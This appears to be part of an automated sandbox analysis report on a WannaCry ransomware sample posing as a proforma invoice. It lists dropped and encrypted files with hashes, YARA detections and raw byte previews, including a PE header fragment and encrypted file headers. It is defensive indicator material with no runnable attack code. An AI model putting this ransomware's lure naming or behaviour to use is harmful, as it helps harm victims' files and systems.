                                                          Process:C:\Program Files\7-Zip\7zG.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3514368
                                                          Entropy (8bit):7.995470941164686
                                                          Encrypted:true
                                                          SSDEEP:98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3x:QqPe1Cxcxk3ZAEUadzR8yc4gB
                                                          MD5:84C82835A5D21BBCF75A61706D8AB549
                                                          SHA1:5FF465AFAABCBF0150D1A3AB2C2E74F3A4426467
                                                          SHA-256:ED01EBFBC9EB5BBEA545AF4D01BF5F1071661840480439C6E5BABE8E080E41AA
                                                          SHA-512:90723A50C20BA3643D625595FD6BE8DCF88D70FF7F4B4719A88F055D5B3149A4231018EA30D375171507A147E59F73478C0C27948590794554D031E7D54B7244
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Author: Joe Security
                                                          • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Author: Florian Roth (with the help of binar.ly)
                                                          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Author: us-cert code analysis team
                                                          • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Author: ReversingLabs
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                          • Antivirus: Virustotal, Detection: 94%, Browse
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T...T...T..X...T.._...T.'.Z...T..^...T..P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L...A..L.................p... 5......w............@...........................5.................................................d.........4..........................................................................................................text....i.......p.................. ..`.rdata..p_.......`..................@..@.data...X........ ..................@....rsrc.....4.......4.................@..@........................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\Desktop\QFAPOWPAFG.mp3

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.81091196419637
                                                          Encrypted:false
                                                          SSDEEP:24:Uwpprt1zcjKaUJm2DC1FjrC2STS/fbPMPSQcwl5nP1tqQ:LnXzcjKZJCjrkW/Thcl5nOQ
                                                          MD5:7CAD906B0D5397918D3AB4D24830FD1D
                                                          SHA1:6C424B4D3DC3034ABA5D009DCD7684560878268A
                                                          SHA-256:F018225FE533F712CECBE76AC1ACBC7700E9EFECF70E51A468B633B00B2DA030
                                                          SHA-512:4A53E3B1E043430BD567D00980F9A6E9B59B0C6F8D5DA3357A4132971D376767660CD6D9803634F1C9E1900AFA3BABFFCF03D13C7F8C6E865D4580C8122315B6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:y.._=k..Ng!X..-.B.gV...c'..2V.]..!.j...5.Y.^.}....A.n..5...R,Ty%G..\......8T.f...O......M.,..)..aG.....|_.?b..5Fhm....0..9.h....". ..}..R.S.f$p....?....Pb.Z...l.B{.2...w.^..v..~.W.Ai?Pfa>.#<.X..S.$o....#._,6~..+.6.=.T.k.<,..:.....]a..V.g..U...VZ.+....ak.....&.A....LV..?..?cU.....9Ze:.....&.....bH.!?..c.h).....8..M....n.......$....2v.......n.u..B...z.<.mPm.C....q\...f.yN0..p7.RF.@.d0.i.|.-...Zj....Q.T...... ..y..._.8.-/..3....%...*....1......DO7......<5b...VH.+.).,.CCK.Fw.Iz...W.C..u...../}.....).......'.N..`..o..}L...$..........$....D.....>.KQ......u.........*<...L.r...V.......u/............#s..P..n..&R.A.gp..I......x.....Z:|.].g8.(..l.sT.?..SB.......#.K........`.)..h6.T."..L..&.4,.09.&.%Gn....Q~....0.?).5}h.p.v...+..oW.x....>b\..^.L..+c.7Qcx..I)...).&..S%+..|J..r:........J.+..=8%@........O.A...55..:6.. .@...@..].,..3..G.....k....D@P...... k&x09g.4c.^s35..9.......V...9gaU.^...&....k.&.3..hO....8.'..5..w.hi..{e.Y.fw.....c]N.B.G). ..

                                                          C:\Users\user\Desktop\QFAPOWPAFG.mp3.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.888896736618122
                                                          Encrypted:false
                                                          SSDEEP:24:bkyA2SW3tC2fHYTUjcKHGn1akQ1yOshK+vy6W1mwGKplDYSnUYvLo60I5t/X:bkEtCaH2UIKm1af18hLvyHpSSnUY2I5N
                                                          MD5:9A7C68678B9228931F06C63EF0B82F52
                                                          SHA1:9BFDD274F8A73827500853C04D2638026E4A3557
                                                          SHA-256:C1F8BEF858F750819D60E6C74D4AD6484B13E77CE8BFE45F2FD086062D7F4F06
                                                          SHA-512:2FD3CC63CB96448D34CB18A6D00663D4CF7CC1C5C6DCB2E0BA286C69CC11558F9E1A8CC6B27A390B41FD651863A2B6DBB2906B2301E6B0B5EAE5C59AC675E7C7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......9.]"@.`...1.7.s..l8.....U....rO..0R.Y........vr.....g."z..p9...,&ns.?.../.}..............w...uk.h%...JK..X..w5R..kjl7....D,.;v.x...xSu4..\.g...&#.w..O.......m..s7#.0.f{J}.%6..|........]..(..A........!....Bx..=:\.8.0C.\.N....;6..n.(...t...dj*M.............>...O....K.t."..E........j......D... .Y.....@...'1f..@.....!.... .S&S..;.L...9..!........pz.0-..,cT@..t....I.T-........z.t.2Q..@pv.e/'.l..E..].J...P...K).NwL_.j...=....r..N....H.)+...v..f.....GC.]..y.Za{..M......|d.${..)...Is.......b<(..l.;.e...'....}.~...$a.PE"..y..G.=+..G.6.....TA>..IZ$|.doU.........%.O..Orkq.V...O.v`...d.;4.......|L.l..........].r.6......a...W..S.Wo..<...../.[...!.o7....-.S@.]+u?F..&m...@_....2-.O....xK...>..}<......N.u5.......k2@i."..Q....t".U......*p...%..!..WJ......+.T.=^.m_D..,..k..%....l.1P.:..Y.H.....T9..>.3..F }.2P...Y.....~7C..Mc`B.C.Q...}.... .j..mNmIk..8?*Q.N...CQ.B....p......!.[7.`..oU..^&.x.3...V.^..o:..,/y......VN..o...q.6..X.p..$...X.mi%.D,k

                                                          C:\Users\user\Desktop\QFAPOWPAFG.mp3.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.888896736618122
                                                          Encrypted:false
                                                          SSDEEP:24:bkyA2SW3tC2fHYTUjcKHGn1akQ1yOshK+vy6W1mwGKplDYSnUYvLo60I5t/X:bkEtCaH2UIKm1af18hLvyHpSSnUY2I5N
                                                          MD5:9A7C68678B9228931F06C63EF0B82F52
                                                          SHA1:9BFDD274F8A73827500853C04D2638026E4A3557
                                                          SHA-256:C1F8BEF858F750819D60E6C74D4AD6484B13E77CE8BFE45F2FD086062D7F4F06
                                                          SHA-512:2FD3CC63CB96448D34CB18A6D00663D4CF7CC1C5C6DCB2E0BA286C69CC11558F9E1A8CC6B27A390B41FD651863A2B6DBB2906B2301E6B0B5EAE5C59AC675E7C7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......9.]"@.`...1.7.s..l8.....U....rO..0R.Y........vr.....g."z..p9...,&ns.?.../.}..............w...uk.h%...JK..X..w5R..kjl7....D,.;v.x...xSu4..\.g...&#.w..O.......m..s7#.0.f{J}.%6..|........]..(..A........!....Bx..=:\.8.0C.\.N....;6..n.(...t...dj*M.............>...O....K.t."..E........j......D... .Y.....@...'1f..@.....!.... .S&S..;.L...9..!........pz.0-..,cT@..t....I.T-........z.t.2Q..@pv.e/'.l..E..].J...P...K).NwL_.j...=....r..N....H.)+...v..f.....GC.]..y.Za{..M......|d.${..)...Is.......b<(..l.;.e...'....}.~...$a.PE"..y..G.=+..G.6.....TA>..IZ$|.doU.........%.O..Orkq.V...O.v`...d.;4.......|L.l..........].r.6......a...W..S.Wo..<...../.[...!.o7....-.S@.]+u?F..&m...@_....2-.O....xK...>..}<......N.u5.......k2@i."..Q....t".U......*p...%..!..WJ......+.T.=^.m_D..,..k..%....l.1P.:..Y.H.....T9..>.3..F }.2P...Y.....~7C..Mc`B.C.Q...}.... .j..mNmIk..8?*Q.N...CQ.B....p......!.[7.`..oU..^&.x.3...V.^..o:..,/y......VN..o...q.6..X.p..$...X.mi%.D,k

                                                          C:\Users\user\Desktop\QFAPOWPAFG.pdf

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.823621733972832
                                                          Encrypted:false
                                                          SSDEEP:24:ePo4IvUVkN55OzXPS2IoB1KhXc+JUIz8YHLTHzGxCFTzYtkSmci:eQdsECzlIoyLUIz8YfHycFfCC
                                                          MD5:10639254F86E54A742C5D70140269FAA
                                                          SHA1:FA2E48766E43250DCC8D030FE9E2D7424087A759
                                                          SHA-256:AE79E37584FF86A9D1A01F70D76B03A897FB38D57F911757A4BF16C4883D5542
                                                          SHA-512:F08863AEA3A548EF42150ECCB9096CA6E4FFCB143F0BDAA5B410F9E5309F2E5E1ECF29D6195B7142BA990515D0CF8C230D68C59A8350033B2472B9D8607669B7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:..5...tS.O.>nV7K.Q.Ip.X)K[|..e....m.-W......2....n5{i~~P.~..Og...D..8G.j.2.j..>Q./...q..u.*.jz....z.FC+.y..#.../n.....g.(.d..K...O..v...."p.U.F.`..J_y'.e".\&.1..6.{?..gj.. ....@.FnE....2....C..Q...].u....Y..:.bW..j...#...t;!.7....+.3f..m ..c...0..N.a."....i.5..(.efL...}.....Rt..Yn.M.(...L.......i.......5..C.! .rAU.5...a..CxH7.9.I..Q.....go.....2.La+v.....y..h..d.... DvH.EH.hi.. [M......@..m...#....N.3....r@.1.G.x../.4.(.:...%....p,...!.c..I........d,:y:7i..kx..=...p..5.\.UA.)-Sg+;~.."..g.T.R.t.M....3........A....?.E..G...$.]..(....]@N...?...!C....Km.O./..l.P....;n...{.K....6...j-cn*..%v......k.....^..s.....d.P.1.nS....>;.n.....%...........,.d.....@....O..wA...>.s.u..#>S:...G...../Y..%j.-...".)BM.2..i......1.l..i...*O..l9.A3.a......"....tL+.Ky:....*...c..W ft.w.+.....h?.H.g...'....$....as..mC[.<5...,..7.;7..U.|...`.X.....K.^.\.....R.......l.*8....Mv..2..A...(w.&[..L..... 3......{.\\..}d.*.SP...V.r$..N&.}.ru..J..N.4..)....T....,B.....BL.'.+

                                                          C:\Users\user\Desktop\QFAPOWPAFG.pdf.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.838150553233862
                                                          Encrypted:false
                                                          SSDEEP:24:bkVztUGPxsJUZBuzBrxUcL5z03lym+ikl7QWTvOFGA6MrwvIGuJ5zDKgTQ:bkQyZB6rSI5zOlym+/rW41Irot
                                                          MD5:3C038B8D9CFFACCD0BCC443C40F2BCDD
                                                          SHA1:BB0B9E9AE7BE8B5863EDEF09CEF4C578EAA84B9D
                                                          SHA-256:BED9564E46D28C7833B40FB4EB51564783D8688E3FCCCCE76D2500C34F0A34BC
                                                          SHA-512:A12A2F8CCF9D8F603714ADBFD426A864E2690F11F884957CE4E92B153225835C592207F544801C5D2BA79AD711AF11618CB202FD6ADBECCC699DB23C350464D8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......l.C......3..G^L.Wi!..en{.w.e......K.9$(]iT.%...b..5'9.........@&y........0.......5....m'!..9.........gM<.eC.(.;.... x..)%6.\....u.........BL.......&..5.yY....Y..7..y..J.|k...kaL., 4.>,..cy..9R.2.G%.....S...Jw...h..W..r...8aB3..y...\M.. p.a..................yA.jH.#.aRi...yR......)O/P...6.7SP....N4.;.ytS....)}G.....r..._....d>.J..B....4...w..7...O1&....^..w.N.......~..#P.:.@.N......E.R._..e:v.%...K.e.......'.]~....r..f.......G*T.Z.O.[x..f..XhG..;~*.....Ef.49.s..E......q._.h.....t.."Z.......x='p.|.M....J.EV..K.7......S.o..6.[6......s(W.K..lu.D<.....T......fG/......M=.....1.Zb....?...2.....&.......5.|%x"...!KLMw Z.n..Z.^/.Nj...L.P...%... ....Cl.........r0P..z.>aL9..;l.....?"..c".p.......nK.`.fA..n....._....V..@..|.3.-..m.........z...}j.x.....aL-px...j._H...qA..e..q.....9.F].3..0jxa)..y.......qu. U.k.....C.'..k.u.0..v.....I..q.T..o3\.Y.<...CR.\=.*..Q.6{m.... .?0F........!!ss2.8.d=...>..*E.*7......u*..}.]1|_.N..YP.I.};..z..*.Z.Ff

                                                          C:\Users\user\Desktop\QFAPOWPAFG.pdf.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.838150553233862
                                                          Encrypted:false
                                                          SSDEEP:24:bkVztUGPxsJUZBuzBrxUcL5z03lym+ikl7QWTvOFGA6MrwvIGuJ5zDKgTQ:bkQyZB6rSI5zOlym+/rW41Irot
                                                          MD5:3C038B8D9CFFACCD0BCC443C40F2BCDD
                                                          SHA1:BB0B9E9AE7BE8B5863EDEF09CEF4C578EAA84B9D
                                                          SHA-256:BED9564E46D28C7833B40FB4EB51564783D8688E3FCCCCE76D2500C34F0A34BC
                                                          SHA-512:A12A2F8CCF9D8F603714ADBFD426A864E2690F11F884957CE4E92B153225835C592207F544801C5D2BA79AD711AF11618CB202FD6ADBECCC699DB23C350464D8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......l.C......3..G^L.Wi!..en{.w.e......K.9$(]iT.%...b..5'9.........@&y........0.......5....m'!..9.........gM<.eC.(.;.... x..)%6.\....u.........BL.......&..5.yY....Y..7..y..J.|k...kaL., 4.>,..cy..9R.2.G%.....S...Jw...h..W..r...8aB3..y...\M.. p.a..................yA.jH.#.aRi...yR......)O/P...6.7SP....N4.;.ytS....)}G.....r..._....d>.J..B....4...w..7...O1&....^..w.N.......~..#P.:.@.N......E.R._..e:v.%...K.e.......'.]~....r..f.......G*T.Z.O.[x..f..XhG..;~*.....Ef.49.s..E......q._.h.....t.."Z.......x='p.|.M....J.EV..K.7......S.o..6.[6......s(W.K..lu.D<.....T......fG/......M=.....1.Zb....?...2.....&.......5.|%x"...!KLMw Z.n..Z.^/.Nj...L.P...%... ....Cl.........r0P..z.>aL9..;l.....?"..c".p.......nK.`.fA..n....._....V..@..|.3.-..m.........z...}j.x.....aL-px...j._H...qA..e..q.....9.F].3..0jxa)..y.......qu. U.k.....C.'..k.u.0..v.....I..q.T..o3\.Y.<...CR.\=.*..Q.6{m.... .?0F........!!ss2.8.d=...>..*E.*7......u*..}.]1|_.N..YP.I.};..z..*.Z.Ff

                                                          C:\Users\user\Desktop\Request for Quotation (RFQ_196).zip

                                                          Download File
                                                          Process:C:\Program Files\7-Zip\7zG.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3481559
                                                          Entropy (8bit):7.999312423782288
                                                          Encrypted:true
                                                          SSDEEP:49152:jymCheymCheymCheymCheymCheymCheymCheymCheymCheymCheymCheymCheymG:+RHRHRHRHRHRHRHRHRHRHRHRHRH9
                                                          MD5:49B0330BEA9FA76157EA17D10930F2B6
                                                          SHA1:7C9D77094744DEEB044BBC70266C3018AE90CF6B
                                                          SHA-256:2F4B69E9EDB6CDC88EF78E5511C251F98AA2188FCB334F65C27B543FE464D253
                                                          SHA-512:E83A091BD2F35E1ACC68F4A499F6D4D617ED58C6BF6BE91622F74F9397675FE4F85579FF53B28C9723C0150631821F8B2BC50B3E6C71CE36098CA778E858C33B
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:.. .......p..]..;.|X.....}...[...Rq..$>..|`...8..98..%ss`3;.j/d.j ...<.p..QM4........qs.z.SE...zc..."4.....e.."..}.uq)..]L..Z\.(.M..\....y#.nIT,.l.....]N.z.4^....~D.....l/%....,mj..6/....X.O$...........3^eZ^%.8..>y....4..9.8.VNF......e.!..*.... ..2}.....)..q.Kv5.<....t..AW..1....9Q.KL.|.....L...?.....@.;...A..*.7...Gkop3..i.....n.}.?.....#.._......&.I.Y...#.x...........a.B...z...gF...)..(.o>V.H.../f....y..........E..b..+.r#Q_....5..M......T=.....1.wb.:.8+...D........x.Q..F.P...p..S.\u".+;(}_...)VM.x*...X..r..z...&R]..{*.vZ.pa......G.\....d5....vVJ..QB..s.m...!+.].0.x..(.;.*..<...j. ..tQ.r......J..../(0rr=....)..p..!.B.f.lm..I?..pT.'...*$=.......G.1.%..&.S.....I.9.4.o.......P../s..c.3i.2...UlLC.eM....j..*8g..-8M.s.-bSd..}...o.u..*.zv.$.TC...]>.......y.V.y......O}...A.$C.VZ`.p...M..R....N".(~Z..~t5......-...+..hm..fQ.....mcW..O~h3...J..!O..3R..`!Es...J.l"9.x.o...3.f.a.n.....C.v.Z.......:[.....2..h....0E i...O}.>."u.........V.Fi.......

                                                          C:\Users\user\Desktop\Request for Quotation (RFQ_196).zip.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3481848
                                                          Entropy (8bit):7.999953777022837
                                                          Encrypted:true
                                                          SSDEEP:49152:lW5Qjb+aV9n68KgCgT7ytENfQdp2FHAhmUCpLSbnMc3k+hnWkOIfAaW:lPjbh9mGuDMFgkUvx3vhQILW
                                                          MD5:FDD5DAE54672529FFF613D8938FE2840
                                                          SHA1:E1343970798E0C801BD0354C6434FE37E6E2228C
                                                          SHA-256:24AC417F3A7C656F76AB3E1210F933F76E78D06A4497B3AE5FA23BC0A93BE7FD
                                                          SHA-512:87E3BF254246C02368D3C5A48FC225A34FC5E35BD44A0BCCE350D52DBF11383E77CC413E3B95CF7DE0DCE2898B860C6EAF710070C62A199C5D1335779FDA2DF8
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....e2....,.....5....$.2./..$z.8.Cn...Y..W.|J.....()."..y.2>...C...0..>*.F.[O7....m........k.]r..X....rG.s..~..V.....O.O..'.|o$.|.1E.........Q..W.........`.w..}&2..H...@.V.*...ry.:...e..Cb.p.7...;.....)}<[.....|K.:.lOZ`.H....B}h3a......<...oN.i......5.....w...g.mi,.:......h..p.{..j:.Yp.C....qMa.O......8-..T..f..[.Gb."...EJz..!..~.S.h.GB......`.B.g.......r..[*.......k..b.psVs.xjw.1T...~*..}QsC./..J.t........1.....c..<..p..u...?S8..B..J.U..x...9Y...1.aZ.v!O.V....d}...w..2.j.$n...?...Z.....~8k.f...~.N]....]...J..6...(..C...r.U..$..+......<u[.{.ta..!9#....9.wn.*l./.z.z.....o...5.KdC.!.......\.3.F+2jk..\..12..EB..p. ...p......}...<.2^...e.....^FSa......./.&|C....2.Ic.K.....G...m.5;.(oH#B.i0t..q..j.f.{......0...-F}../p....T...-.6d.bLt..qP..i.>gL..d....M.LV..k.f..$.9.n..X.....{....K.6S...>..80.....c..W?V}.k...Jh...../k.x6..f..h....\\..o.M....ed|..C.d*..@;.{"v5.4-#..s......}...[.,.~.b..}5....p.....Y.8@...?..Uk^...Q.....=.b....Z4.=.n...S

                                                          C:\Users\user\Desktop\Request for Quotation (RFQ_196).zip.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3481848
                                                          Entropy (8bit):7.999953777022837
                                                          Encrypted:true
                                                          SSDEEP:49152:lW5Qjb+aV9n68KgCgT7ytENfQdp2FHAhmUCpLSbnMc3k+hnWkOIfAaW:lPjbh9mGuDMFgkUvx3vhQILW
                                                          MD5:FDD5DAE54672529FFF613D8938FE2840
                                                          SHA1:E1343970798E0C801BD0354C6434FE37E6E2228C
                                                          SHA-256:24AC417F3A7C656F76AB3E1210F933F76E78D06A4497B3AE5FA23BC0A93BE7FD
                                                          SHA-512:87E3BF254246C02368D3C5A48FC225A34FC5E35BD44A0BCCE350D52DBF11383E77CC413E3B95CF7DE0DCE2898B860C6EAF710070C62A199C5D1335779FDA2DF8
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....e2....,.....5....$.2./..$z.8.Cn...Y..W.|J.....()."..y.2>...C...0..>*.F.[O7....m........k.]r..X....rG.s..~..V.....O.O..'.|o$.|.1E.........Q..W.........`.w..}&2..H...@.V.*...ry.:...e..Cb.p.7...;.....)}<[.....|K.:.lOZ`.H....B}h3a......<...oN.i......5.....w...g.mi,.:......h..p.{..j:.Yp.C....qMa.O......8-..T..f..[.Gb."...EJz..!..~.S.h.GB......`.B.g.......r..[*.......k..b.psVs.xjw.1T...~*..}QsC./..J.t........1.....c..<..p..u...?S8..B..J.U..x...9Y...1.aZ.v!O.V....d}...w..2.j.$n...?...Z.....~8k.f...~.N]....]...J..6...(..C...r.U..$..+......<u[.{.ta..!9#....9.wn.*l./.z.z.....o...5.KdC.!.......\.3.F+2jk..\..12..EB..p. ...p......}...<.2^...e.....^FSa......./.&|C....2.Ic.K.....G...m.5;.(oH#B.i0t..q..j.f.{......0...-F}../p....T...-.6d.bLt..qP..i.>gL..d....M.LV..k.f..$.9.n..X.....{....K.6S...>..80.....c..W?V}.k...Jh...../k.x6..f..h....\\..o.M....ed|..C.d*..@;.{"v5.4-#..s......}...[.,.~.b..}5....p.....Y.8@...?..Uk^...Q.....=.b....Z4.=.n...S

                                                          C:\Users\user\Desktop\Request for Quotation (RFQ_196).zip.zip

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3482858
                                                          Entropy (8bit):7.99937050113591
                                                          Encrypted:true
                                                          SSDEEP:49152:8SQeqSQeqSQeqSQeqSQeqSQeqSQeqSQeqSQeqSQeqSQeqSQeqSQel:T
                                                          MD5:BF9DEF5B84E6E02842CCD723DF557D3F
                                                          SHA1:686EF48213DA663416924DF6A5DACE96512F5AF7
                                                          SHA-256:300D4941CABBDEDAF918D1910A47E98CD73419958C7DBAEE0AC671326E738779
                                                          SHA-512:96B4156B94C9234EFA7058A83FBE653722C384D6036AA98FD5D89A1C3C4884A810C9349DD088103965360E98B8B6BE89DCEA04549CB7EACCC4FE3C669A07BBC6
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:H.'.b.l....^67... .G\?k...N..>.o+..S..~...QZ2.1.l..2FRJ...`.}..........@...P....5....Z1.B.o.g'\..M.1/.8j..j^.a.V.....r.Xp......|.M'g..c.....W..."..b..I.:*.q4zP.9{.C.._.....>..i..\..Y...AW...C.D...y.Pm.....Xj+..j..[j..I...2WfS.xX.. rA...........\..DQ..bC....~.].&u...L._.<*......f...Sl:..!...2b.Z..%..Y?K......$.5O*..y`...9.&.u.$m~C3[+.$.Y.h...9..o<..W..p........s}....U....eS:......g.5.T..!....s.E\...|...D@|L...h.to@...C...5.SS.G0j.f.W...m....V.....[7..$.5....R...pLK..tmA.....v.R=G)15.l&O...;.6T.?....^.J...+U4`..N........U.KG..6%,9...4ZL...S6......D.{..3....g............D..@...ghm.&.. ...?.k.3..|{e6..Q....^.0....W(>..g.[..r..WI.z{..5\s.#....*....8...../.V.EZ..S.......o..r!...98...H...5Vqs.)>...9.xK([..=...."Ld....P..=....R..zM7....f|..i...Q..g.M..........n~.....)......@.<..=.oo'.............i..a....9y..s.v..mq.`..b7..<..*C].b...0.H.._..EUx..'..t..LA.....Z.....L....9.?...u.9.v[>f..7x.2.U.%p....}..'..u...........b..v..:..7..}.B.CAr.Y[.#.;{

                                                          C:\Users\user\Desktop\Request for Quotation (RFQ_196).zip.zip.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3483144
                                                          Entropy (8bit):7.999949139738267
                                                          Encrypted:true
                                                          SSDEEP:49152:Wc/+YWHNr3YvRfnPRx6OSHGK9/yc3YdMHJKAL6iXtmLvlO5ZMzzUB0rnrI9cLDe:Wc/+/NURxDKhN3YoJ3eiXgLNOD+fTra
                                                          MD5:6A18852DDF3F0422793AC24A6E8179EF
                                                          SHA1:E5C986206E05D697853386BA93A92CE2097580A2
                                                          SHA-256:CF1D5F6D95CECC13B48992173E192AAB98E1CD8F9C084AC2DB80C0CAEB91B22D
                                                          SHA-512:7F6F61006FD1781BDF6EC49B3AF766453C676366C469D65B20918B9538AA3E9D17392895643A0CA5E8BAB4484128D3196CAE93BD3D7D0A47571A831F927BA069
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....X_...^..9.r....<.....:.F\j....h.o.i?@.....6..5..,.o..M....>v.D.....=...h.^b...o...X.....H..(..1@..,@.$..*tH..6-..VS..xf.H.Rf"C...1....@..`q.I....WVt......y.g^N.B.......k...{.K..._........-${.F...`{....9......Ewx.^...#L..W.O.0i.....?....,.....$5........U.....0.s..".&1. @w...[.C..'.O3.........V.V.K`...j$."..8.YD.CF......M.Ju.}V...-.=........D..c.K.A?"+...t..I...i@.%w..&..Z....#x..p..f...U.&m.......v......Z.G....9..:...>.h.G......q..3'*.U......9'{.."m....<.*}.........(~9.5.M.O...y..i.....6.3.d~.aN..{......!dFc.].P...c..Bz..dy<.$...Z..a...f8.K.RP.m.8........J{..2.6.....1...c.BQ{.e.Hx..jv......../.......FAz.PEp...zo.+[..>2.(...!...R..]t.vX......h{{+?.|x...|X..D..U{{....-(.;.>}3......I..j.5....XH...G......s...C..2.7F...:. ..o..z.~6.N..w.....bX_....G."R.&g~.x..g.b...gX.&q;.6.5.!r..U.:.C....oQ..w.3..Z....R./.......|.....C.B........D..._...M....kL.1.q!u..w...$Hd.-fH6w.....`7..._cG.9...7..;cv.".X....{........x.K....1@!.#"..U..&.C.r_p\Er%z5

                                                          C:\Users\user\Desktop\Request for Quotation (RFQ_196).zip.zip.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3483144
                                                          Entropy (8bit):7.999949139738267
                                                          Encrypted:true
                                                          SSDEEP:49152:Wc/+YWHNr3YvRfnPRx6OSHGK9/yc3YdMHJKAL6iXtmLvlO5ZMzzUB0rnrI9cLDe:Wc/+/NURxDKhN3YoJ3eiXgLNOD+fTra
                                                          MD5:6A18852DDF3F0422793AC24A6E8179EF
                                                          SHA1:E5C986206E05D697853386BA93A92CE2097580A2
                                                          SHA-256:CF1D5F6D95CECC13B48992173E192AAB98E1CD8F9C084AC2DB80C0CAEB91B22D
                                                          SHA-512:7F6F61006FD1781BDF6EC49B3AF766453C676366C469D65B20918B9538AA3E9D17392895643A0CA5E8BAB4484128D3196CAE93BD3D7D0A47571A831F927BA069
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....X_...^..9.r....<.....:.F\j....h.o.i?@.....6..5..,.o..M....>v.D.....=...h.^b...o...X.....H..(..1@..,@.$..*tH..6-..VS..xf.H.Rf"C...1....@..`q.I....WVt......y.g^N.B.......k...{.K..._........-${.F...`{....9......Ewx.^...#L..W.O.0i.....?....,.....$5........U.....0.s..".&1. @w...[.C..'.O3.........V.V.K`...j$."..8.YD.CF......M.Ju.}V...-.=........D..c.K.A?"+...t..I...i@.%w..&..Z....#x..p..f...U.&m.......v......Z.G....9..:...>.h.G......q..3'*.U......9'{.."m....<.*}.........(~9.5.M.O...y..i.....6.3.d~.aN..{......!dFc.].P...c..Bz..dy<.$...Z..a...f8.K.RP.m.8........J{..2.6.....1...c.BQ{.e.Hx..jv......../.......FAz.PEp...zo.+[..>2.(...!...R..]t.vX......h{{+?.|x...|X..D..U{{....-(.;.>}3......I..j.5....XH...G......s...C..2.7F...:. ..o..z.~6.N..w.....bX_....G."R.&g~.x..g.b...gX.&q;.6.5.!r..U.:.C....oQ..w.3..Z....R./.......|.....C.B........D..._...M....kL.1.q!u..w...$Hd.-fH6w.....`7..._cG.9...7..;cv.".X....{........x.K....1@!.#"..U..&.C.r_p\Er%z5

                                                          C:\Users\user\Desktop\TaskData\Tor\libeay32.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3197106
                                                          Entropy (8bit):6.130063064844696
                                                          Encrypted:false
                                                          SSDEEP:98304:W5FYc9YouOquJVqrR1LlZRUT83DlJrqd+kq:WrjYouOquJgrlZ283xFqdq
                                                          MD5:6ED47014C3BB259874D673FB3EAEDC85
